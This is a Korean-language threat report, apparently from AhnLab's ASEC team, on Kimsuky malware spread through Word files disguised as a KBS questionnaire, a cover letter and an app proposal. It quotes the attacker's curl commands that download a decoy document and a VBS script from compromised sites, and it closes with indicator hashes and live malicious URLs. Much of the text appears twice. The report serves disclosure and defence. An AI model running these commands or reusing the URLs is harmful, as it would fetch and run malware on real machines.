정상 문서로 위장한 악성코드(kimsuky)
Contents
ASEC 분석팀은 최근 <원고 청탁서로 위장한 악성코드 (안보 분야 종사자 대상)>에서 소개한 악성코드가 안보 분야 뿐만 아니라 방송 및 일반 기업들을 타겟으로 유포 중임을 확인하였다. 해당 악성 문서들은 모두 위 블로그 글에서 소개한 악성코드와 동일하게 템플릿 인젝션(Template Injection) 기법을 사용하고 있으며 악성 워드 매크로 문서를 다운로드 받아 실행한다. 확인된 유포 파일명은 다음과 같다.
- [kbs 일요진단]질문지.docx
- 임** 자기소개서.docx
- app-planning – copy.docx
공격자는 악성 매크로 코드가 실행될 수 있도록 매크로 실행을 유도하는 이미지를 사용하였다. 해당 이미지는 과거부터 꾸준히 사용하고 있으며 모두 동일한 공격자로 추정된다.
추가 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
- hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
다운로드 받은 문서 파일에 포함된 악성 매크로가 실행되면 curl 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 배치 파일에는 정상 문서와 추가 악성 스크립트를 다운로드 및 실행하는 코드가 존재한다. 사용된 curl 명령어는 다음과 같다.
- curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
- curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60
확인된 정상 문서는 다음과 같이 자기소개서, 어플 제안서 등으로 위장하였다.
추가 악성 스크립트의 …
- [kbs 일요진단]질문지.docx
- 임** 자기소개서.docx
- app-planning – copy.docx
공격자는 악성 매크로 코드가 실행될 수 있도록 매크로 실행을 유도하는 이미지를 사용하였다. 해당 이미지는 과거부터 꾸준히 사용하고 있으며 모두 동일한 공격자로 추정된다.
추가 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
- hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
다운로드 받은 문서 파일에 포함된 악성 매크로가 실행되면 curl 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 배치 파일에는 정상 문서와 추가 악성 스크립트를 다운로드 및 실행하는 코드가 존재한다. 사용된 curl 명령어는 다음과 같다.
- curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
- curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60
확인된 정상 문서는 다음과 같이 자기소개서, 어플 제안서 등으로 위장하였다.
추가 악성 스크립트의 …
IoC
3cdf9f829ed03e1ac17b72b636d84d0b
55a46a2415d18093abcd59a0bf33d0a9
705ef00224f3f7b02e29f21eb6e10d02
83b4d96fc75f74bb589c28e8a9eddbbf
873b2b0656ee9f6912390b5abc32b276
http://ddim.co.kr/gnuboard4/adm/cmg/upload/init.dotm
http://ddim.co.kr/gnuboard4/adm/cmg/upload/show.php
http://gdtech.kr/gnuboard4/adm/cmg/attatch/init.dotm
http://gdtech.kr/gnuboard4/adm/cmg/upload/list.php?query=60
http://gdtech.kr/gnuboard4/adm/cmg/upload/show.php
http://gdtech.kr/gnuboard4/adm/cmg/upload/state.docx
http://jooshineng.com/gnuboard4/adm/img/ghp/up/state.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload2/init.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload3/init.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload3/show.php
55a46a2415d18093abcd59a0bf33d0a9
705ef00224f3f7b02e29f21eb6e10d02
83b4d96fc75f74bb589c28e8a9eddbbf
873b2b0656ee9f6912390b5abc32b276
http://ddim.co.kr/gnuboard4/adm/cmg/upload/init.dotm
http://ddim.co.kr/gnuboard4/adm/cmg/upload/show.php
http://gdtech.kr/gnuboard4/adm/cmg/attatch/init.dotm
http://gdtech.kr/gnuboard4/adm/cmg/upload/list.php?query=60
http://gdtech.kr/gnuboard4/adm/cmg/upload/show.php
http://gdtech.kr/gnuboard4/adm/cmg/upload/state.docx
http://jooshineng.com/gnuboard4/adm/img/ghp/up/state.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload2/init.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload3/init.dotm
http://www.hydrotec.co.kr/bbs/img/cmg/upload3/show.php